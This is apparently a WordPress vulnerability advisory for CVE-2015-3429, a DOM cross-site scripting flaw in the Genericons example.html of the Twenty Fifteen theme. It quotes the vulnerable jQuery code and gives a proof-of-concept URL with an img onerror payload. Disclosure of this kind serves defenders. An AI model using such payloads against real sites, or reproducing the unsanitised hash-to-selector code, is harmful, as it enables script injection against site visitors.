Twenty Fifteen Theme <= 1.1 – DOM Cross-Site Scripting (XSS) | CVE 2015-3429

Description

Genericons <= 3.2 vulnerable to DOM XSS in the example.html file due to using outdated version of jQuery and vulnerable code.

Vulnerable Code:

permalink = "genericon-" + window.location.hash.split('#')[1];
cssclass = jQuery( '.' + permalink ).attr('class');

Proof of Concept

http://www.example.com/wp-content/themes/twentyfifteen/genericons/example.html#1<img/ src=1 onerror= alert(1)>

Affects Themes

twentyfifteen

Fixed in 1.2

References

CVE

CVE-2015-3429

URL

https://packetstormsecurity.com/files/#131802/

URL

https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html

URL

https://seclists.org/fulldisclosure/2015/May/41

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter

ethicalhack3r

Verified

Yes

WPVDB ID

2499b30a-4bcc-462a-935e-1fe4664b95d5

Timeline

Publicly Published

2015-05-06 (about 10 years ago)

Added

2015-05-06 (about 10 years ago)

Last Updated

2019-10-21 (about 6 years ago)

Other

Published

Title

Published

2023-10-16

Title

WP Simple Table Manager Plugin < 1.6.1 - Admin+ Stored Cross-Site Scripting

Published

2024-10-15

Title

Awesome Contact Form7 for Elementor < 3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-08-08

Title

Gutentor < 3.3.6 - Contributor+ Stored XSS

Published

2017-11-11

Title

Email Log <= 2.2.2 - Stored Cross-Site Scripting (XSS)

Published

2025-08-25

Title

Theme Switcher Reloaded <= 1.1 - Reflected Cross-Site Scripting